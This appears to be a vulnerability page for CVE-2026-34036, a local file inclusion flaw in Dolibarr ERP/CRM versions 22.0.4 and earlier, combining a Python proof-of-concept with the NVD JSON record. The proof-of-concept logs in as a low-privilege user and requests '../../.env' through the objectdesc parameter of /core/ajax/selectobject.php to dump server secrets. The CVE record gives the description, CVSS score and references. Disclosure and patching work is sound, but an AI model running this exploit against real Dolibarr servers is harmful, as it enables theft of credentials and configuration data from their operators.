CVE-2026-34036

import requests # CVE-2026-34036 PoC for Dolibarr LFI # Target: Dolibarr <= 22.0.4 # Endpoint: /core/ajax/selectobject.php # Note: Requires authentication (low privilege) target_url = "http://target-url/core/ajax/selectobject.php" # Authenticate and get session cookie (simplified) session = requests.Session() login_payload = { "username": "low_priv_user", "password": "password" } session.post("http://target-url/index.php", data=login_payload) # Exploit payload: Path traversal to read .env file params = { "objectdesc": "../../.env" } response = session.get(target_url, params=params) if response.status_code == 200: print("[+] Exploit successful! File content:") print(response.text) else: print("[-] Exploit failed or file not found")

{"cve": {"id": "CVE-2026-34036", "sourceIdentifier": "[email protected]", "published": "2026-03-31T03:15:57.710", "lastModified": "2026-04-03T16:54:36.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…). At time of publication, there are no publicly available patches."}, {"lang": "es", "value": "Dolibarr es un paquete de software de planificación de recursos empresariales (ERP) y gestión de relaciones con clientes (CRM). En las versiones 22.0.4 y anteriores, existe una vulnerabilidad de inclusión local de ficheros (LFI) en el endpoint AJAX principal /core/ajax/selectobject.php. Al manipular el parámetro objectdesc y explotar un fallo lógico de 'fail-open' en la función de control de acceso principal restrictedArea(), un usuario autenticado sin privilegios específicos puede leer el contenido de ficheros no PHP arbitrarios en el servidor (como .env, .htaccess, copias de seguridad de configuración o registros...). En el momento de la publicación, no hay parches disponibles públicamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*", "versionEndIncluding": "22.0.4", "matchCriteriaId": "3BAE3269-374D-425C-B943-C4DA4494F7BF"}]}]}], "references": [{"url": "https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}